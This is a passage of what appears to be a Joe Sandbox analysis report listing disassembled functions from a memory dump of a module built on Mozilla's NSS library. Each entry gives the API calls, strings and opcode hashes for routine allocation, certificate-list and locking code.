Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PORT_ArenaAlloc_Util.NSS3(00000000,0000003C,?,?,?,?,?), ref: 6C5FED02

Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60116E

PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?), ref: 6C5FED5A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena$Util$Alloc_AllocateArena_Value$CriticalEnterFreeInitLockPoolSectionUnlockcalloc
String ID:
API String ID: 2957673229-0
Opcode ID: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction ID: d6599264f289043b28da02cc21a0798c768c21d5195a97c96a0bc3a8f17e161e
Opcode Fuzzy Hash: fde359a11de0bfe4845df7f2d5157b0e79017d69c9f1ce55be8417e26a882dd5
Instruction Fuzzy Hash: 4921D4B1A007429BE704CF25DD44B52B7E5BFE5308F15C219E81CC7A62EBB0E595CAE4

Function 6C62EDB0 Relevance: 6.1, APIs: 4, Instructions: 62memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE013,00000000,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EDD4
realloc.MOZGLUE(C7C1920F,?,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EDFD
PORT_Alloc_Util.NSS3(?,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EE14

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

memcpy.VCRUNTIME140(?,?,6C619767,00000000,00000000,6C617FFA,?,6C619767,?,8B7874C0,0000A48E), ref: 6C62EE33

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_ErrorUtilValuemallocmemcpyrealloc
String ID:
API String ID: 3903481028-0
Opcode ID: ab9cb24c4eb5351f171bcce45f3e3395d7a22f946f2e3105262bd9d309c6612f
Instruction ID: e8f851b8a9b99a6262b708de0fb0ce716457e3836dd44d9e0a811891a100749a
Opcode Fuzzy Hash: ab9cb24c4eb5351f171bcce45f3e3395d7a22f946f2e3105262bd9d309c6612f
Instruction Fuzzy Hash: D411C2B1A00706ABEB109E75DC84B46B3A8EF0035EF244531E91996A00E339F465CFE9

Function 6C5ADFA0 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 6C5C06A0: TlsGetValue.KERNEL32 ref: 6C5C06C2
Part of subcall function 6C5C06A0: EnterCriticalSection.KERNEL32(?), ref: 6C5C06D6
Part of subcall function 6C5C06A0: PR_Unlock.NSS3 ref: 6C5C06EB

CERT_NewCertList.NSS3 ref: 6C5ADFBF
CERT_AddCertToListTail.NSS3(00000000,?), ref: 6C5ADFDB
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C5ADFFA
PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5AE029

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Cert$List$CriticalEnterErrorFindIssuerSectionTailUnlockValue
String ID:
API String ID: 3183882470-0
Opcode ID: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction ID: f7b44f3bb358e6d7489e702c8f58d63fc87dbcf4bb16cac7cd3598320caf8640
Opcode Fuzzy Hash: 405f845adc6167fc33325065f84957d7f9857c790e95633a98274b85cba4a1ef
Instruction Fuzzy Hash: 0D11CC71A04206ABDB115EEB5C44BAF75A8BB8535CF040534E918D7B00F7B6DC2796E1

Function 6C5C8DD0 Relevance: 6.1, APIs: 4, Instructions: 53COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5C8DE7
EnterCriticalSection.KERNEL32 ref: 6C5C8DFC
PR_Unlock.NSS3 ref: 6C5C8E2D
PR_SetError.NSS3 ref: 6C5C8E49

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue
String ID:
API String ID: 284873373-0
Opcode ID: e0cf06219f758a77fe7b74d5378635e4f0887b2ac3039460d9311d2728b6d687
Instruction ID: 427bc660176d113be4b1ab97ca93bd9aa024f79b9ba54bd4cf00148a71927a92
Opcode Fuzzy Hash: e0cf06219f758a77fe7b74d5378635e4f0887b2ac3039460d9311d2728b6d687
Instruction Fuzzy Hash: F2114F756056149BD700AF78D88855ABBF4FF45314F014969DC89D7B00EB30E854CBD6

Function 6C64AC70 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(000A34B6,00000000,00000678,?,6C635F17,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64AC94
PK11_FreeSymKey.NSS3(08C483FF,00000000,00000678,?,6C635F17,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACA6
free.MOZGLUE(20868D04,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACC0
free.MOZGLUE(04C48300,?,?,?,?,?,?,?,?,6C63AAD4), ref: 6C64ACDB

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: free$DestroyFreeK11_Monitor
String ID:
API String ID: 3989322779-0
Opcode ID: da4238b9d64404980aa5fca4bc64cb57a887b64ec66fefeef79b44afcef67702
Instruction ID: 7c091ae0ee5e7b9a0a51fda39daf0d9e3888cdd169cf19a48ec5b55bc23c40c2
Opcode Fuzzy Hash: da4238b9d64404980aa5fca4bc64cb57a887b64ec66fefeef79b44afcef67702
Instruction Fuzzy Hash: B3018CB1601B01ABEB60DF2AE908743B7E8BF00799B008839D85AC3E00E731F414CBD4

Function 6C5B1DD0 Relevance: 6.0, APIs: 4, Instructions: 48COMMON

Download Yara Rule

APIs

CERT_DestroyCertificate.NSS3(?), ref: 6C5B1DFB

Part of subcall function 6C5A95B0: TlsGetValue.KERNEL32(00000000,?,6C5C00D2,00000000), ref: 6C5A95D2
Part of subcall function 6C5A95B0: EnterCriticalSection.KERNEL32(?,?,?,6C5C00D2,00000000), ref: 6C5A95E7
Part of subcall function 6C5A95B0: PR_Unlock.NSS3(?,?,?,?,6C5C00D2,00000000), ref: 6C5A9605

PR_EnterMonitor.NSS3 ref: 6C5B1E09

Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690AB
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C6690C9
Part of subcall function 6C669090: EnterCriticalSection.KERNEL32 ref: 6C6690E5
Part of subcall function 6C669090: TlsGetValue.KERNEL32 ref: 6C669116
Part of subcall function 6C669090: LeaveCriticalSection.KERNEL32 ref: 6C66913F

Part of subcall function 6C5AE190: PR_EnterMonitor.NSS3(?,?,6C5AE175), ref: 6C5AE19C
Part of subcall function 6C5AE190: PR_EnterMonitor.NSS3(6C5AE175), ref: 6C5AE1AA
Part of subcall function 6C5AE190: PR_ExitMonitor.NSS3 ref: 6C5AE208
Part of subcall function 6C5AE190: PL_HashTableRemove.NSS3(?), ref: 6C5AE219
Part of subcall function 6C5AE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AE231
Part of subcall function 6C5AE190: PORT_FreeArena_Util.NSS3(?,00000000), ref: 6C5AE249
Part of subcall function 6C5AE190: PR_ExitMonitor.NSS3 ref: 6C5AE257

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B1E37
PR_ExitMonitor.NSS3 ref: 6C5B1E4A

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Monitor$Enter$Value$CriticalExitSection$Arena_FreeUtil$CertificateDestroyErrorHashLeaveRemoveTableUnlock
String ID:
API String ID: 499896158-0
Opcode ID: 79226e0484e761aa869166de52321e7e43b47d72e99aab51116cd9c6a9ae8bfa
Instruction ID: b9e03bcfac2fad2cf993df5534e29a73ecdd5054b16b35a23c20f0897eea4378
Opcode Fuzzy Hash: 79226e0484e761aa869166de52321e7e43b47d72e99aab51116cd9c6a9ae8bfa
Instruction Fuzzy Hash: 5B018FB1B0015097EB409F6AEC14F477FA4AB42B5CF204035F919ABB91EB71E824CBD6

Function 6C5B1D50 Relevance: 6.0, APIs: 4, Instructions: 47memoryCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5B1D75
PORT_ZAlloc_Util.NSS3(0000000C), ref: 6C5B1D89
PORT_ZAlloc_Util.NSS3(00000010), ref: 6C5B1D9C
free.MOZGLUE(00000000), ref: 6C5B1DB8

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Errorfree
String ID:
API String ID: 939066016-0
Opcode ID: 53fc1d05d2f8a9d646cdf1f150705ae0733145b06447502a20a99cc3ef4ae9de
Instruction ID: 0ffe59e38de1b28551a35b86de10bb73f1a046dcd243d86cadc1f0daa5662ca3
Opcode Fuzzy Hash: 53fc1d05d2f8a9d646cdf1f150705ae0733145b06447502a20a99cc3ef4ae9de
Instruction Fuzzy Hash: 93F0F9B26012105BFB505F5A6C51B573A989B81798F100635DD1967B44DA71E40482E5

Function 6C5FFD80 Relevance: 6.0, APIs: 4, Instructions: 43memoryCOMMON

Download Yara Rule

APIs

PORT_Alloc_Util.NSS3(0000000C,?,?,00000001,?,6C5A9003,?), ref: 6C5FFD91

Part of subcall function 6C600BE0: malloc.MOZGLUE(6C5F8D2D,?,00000000,?), ref: 6C600BF8
Part of subcall function 6C600BE0: TlsGetValue.KERNEL32(6C5F8D2D,?,00000000,?), ref: 6C600C15

PORT_Alloc_Util.NSS3(A4686C60,?), ref: 6C5FFDA2
memcpy.VCRUNTIME140(00000000,12D068C3,A4686C60,?,?), ref: 6C5FFDC4
free.MOZGLUE(00000000,?,?), ref: 6C5FFDD1

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Alloc_Util$Valuefreemallocmemcpy
String ID:
API String ID: 2335489644-0
Opcode ID: a840b4197c07c4a05d5bba91eb8bbaf2a038d4ba1889cee93ac965cec24704c2
Instruction ID: 0c9be5deb42ab95cbec44f049cc54c176b85d563340cc3e97138d2e83e02389e
Opcode Fuzzy Hash: a840b4197c07c4a05d5bba91eb8bbaf2a038d4ba1889cee93ac965cec24704c2
Instruction Fuzzy Hash: 7EF04CF16012026BEB085F55DC8081B77D8EF41298B108174ED19CBF05E721D815CBF5

Function 6C6BCC50 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

DeleteCriticalSection.KERNEL32(?), ref: 6C6BCC61
free.MOZGLUE ref: 6C6BCC6E
DeleteCriticalSection.KERNEL32(?), ref: 6C6BCC80
free.MOZGLUE(?), ref: 6C6BCC87

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSectionfree
String ID:
API String ID: 2988086103-0
Opcode ID: 7c26cb2a911d8512b96fe3bddf0719fb9a78edcde20dc1c6b987409b2b2e9bd6
Instruction ID: 231bf203378c048ad9c88c4ca07a0d0175373311adec6c00c8daa08650283bc8
Opcode Fuzzy Hash: 7c26cb2a911d8512b96fe3bddf0719fb9a78edcde20dc1c6b987409b2b2e9bd6
Instruction Fuzzy Hash: DCE06576700609AFCB10EFA9DC84C8777BCEE492707150525E692C3740D232F915CBE5

Function 6C599DC0 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3 ref: 6C599E1F

Part of subcall function 6C5513C0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,6C522352,?,00000000,?,?), ref: 6C551413
Part of subcall function 6C5513C0: memcpy.VCRUNTIME140(00000000,R#Rl,00000002,?,?,?,?,6C522352,?,00000000,?,?), ref: 6C5514C0

Strings

ESCAPE expression must be a single character, xrefs: 6C599F78
LIKE or GLOB pattern too complex, xrefs: 6C59A006

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: memcpysqlite3_value_textstrlen
String ID: ESCAPE expression must be a single character$LIKE or GLOB pattern too complex
API String ID: 2453365862-264706735
Opcode ID: eb6e106172c330160b6ebce866e6acc30575bd53b5c70f47a60a290865f69856
Instruction ID: 71af588d8aafcc9854115d6e99288fea5fad891a2ab03dbc00b45a9fae08b7ca
Opcode Fuzzy Hash: eb6e106172c330160b6ebce866e6acc30575bd53b5c70f47a60a290865f69856
Instruction Fuzzy Hash: 69811E74A042958FDB01CF29C8803A9B7F2AF85318F2886D9D8AD8BB81D735DC46C791

Function 6C5F4D10 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5F4D57
PR_snprintf.NSS3(?,00000008,%d.%d,?,?), ref: 6C5F4DE6

Strings

%d.%d, xrefs: 6C5F4DDE

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: ErrorR_snprintf
String ID: %d.%d
API String ID: 2298970422-3954714993
Opcode ID: 8580b573f91508c8aa804e0f1c23fa68d82c9d11da3fb833f415b69bfe46178c
Instruction ID: 0af4fa407b9152389b20cdcb8594932dd8538674af7f57a679d4a50d2474e2da
Opcode Fuzzy Hash: 8580b573f91508c8aa804e0f1c23fa68d82c9d11da3fb833f415b69bfe46178c
Instruction Fuzzy Hash: F931ECB2D042196BEB149BA19C05BFF7768DF81308F050469ED259B782EB309906CFB6

Function 6C614CF0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

SECOID_FindOIDByTag_Util.NSS3('8al,00000000,00000000,?,?,6C613827,?,00000000), ref: 6C614D0A

Part of subcall function 6C600840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C6008B4

SECITEM_ItemsAreEqual_Util.NSS3(00000000,00000000,00000000), ref: 6C614D22

Part of subcall function 6C5FFD30: memcmp.VCRUNTIME140(?,AF840FC0,8B000000,?,6C5A1A3E,00000048,00000054), ref: 6C5FFD56

Strings

'8al, xrefs: 6C614D07

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Equal_ErrorFindItemsTag_memcmp
String ID: '8al
API String ID: 1521942269-238783270
Opcode ID: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction ID: 9d353dcc8acc3db5173c242aaa3963e4e988034de41432e4b318d05e0bbaabfe
Opcode Fuzzy Hash: 14028aa1c084b1134f31e0fe545c68cf4cce508ec734b29011f619df16d7203e
Instruction Fuzzy Hash: B6F06872A1512467DF104E6E9C40B5336DC9B417BEF180271DD28CBF81E6A1CC01C6A6

Function 6C63AF70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

PR_GetUniqueIdentity.NSS3(SSL), ref: 6C63AF78

Part of subcall function 6C59ACC0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C59ACE2
Part of subcall function 6C59ACC0: malloc.MOZGLUE(00000001), ref: 6C59ACEC
Part of subcall function 6C59ACC0: strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C59AD02
Part of subcall function 6C59ACC0: TlsGetValue.KERNEL32 ref: 6C59AD3C
Part of subcall function 6C59ACC0: calloc.MOZGLUE(00000001,?), ref: 6C59AD8C
Part of subcall function 6C59ACC0: PR_Unlock.NSS3 ref: 6C59ADC0
Part of subcall function 6C59ACC0: PR_Unlock.NSS3 ref: 6C59AE8C
Part of subcall function 6C59ACC0: free.MOZGLUE(?), ref: 6C59AEAB

memcpy.VCRUNTIME140(6C703084,6C7002AC,00000090), ref: 6C63AF94

Strings

SSL, xrefs: 6C63AF73

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 6d85f480c1fb907ba3419f4314d478704ed9acf0c98b89c8f407ebb10d81b10c
Instruction ID: a33506571db8ac6a0d3eb131f43bb43c8e192ea4b6354680a524dd25601bd026
Opcode Fuzzy Hash: 6d85f480c1fb907ba3419f4314d478704ed9acf0c98b89c8f407ebb10d81b10c
Instruction Fuzzy Hash: 67214DF2716E68AEDB00DF529543B127AB2B742308710722DD11E4BB2ADB3180089FDD

Function 6C590F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F1B

Part of subcall function 6C591370: GetSystemInfo.KERNEL32(?,?,?,?,6C590936,?,6C590F20,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000), ref: 6C59138F

PR_NewLogModule.NSS3(clock,6C590936,FFFFE8AE,?,6C5216B7,00000000,?,6C590936,00000000,?,6C52204A), ref: 6C590F25

Part of subcall function 6C591110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C590936,00000001,00000040), ref: 6C591130
Part of subcall function 6C591110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C590936,00000001,00000040), ref: 6C591142
Part of subcall function 6C591110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C590936,00000001), ref: 6C591167

Strings

clock, xrefs: 6C590F20

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: 2a3a27f644cece9bb53de8dfaf3ad051f304dfd841dff1168e993b530d0a04b0
Instruction ID: 0b61935176a35e588df3ce3fab1667946df6675fa10aaa7a02392f3fac3405ab
Opcode Fuzzy Hash: 2a3a27f644cece9bb53de8dfaf3ad051f304dfd841dff1168e993b530d0a04b0
Instruction Fuzzy Hash: A1D022B27043A8B2C50022979C44F97B3BCC7C32B9F0088BAE00841D104FA454DAD369

Function 6C600DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C600DF5
TlsGetValue.KERNEL32 ref: 6C600E2D
TlsGetValue.KERNEL32 ref: 6C600E58
TlsGetValue.KERNEL32 ref: 6C600E84

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
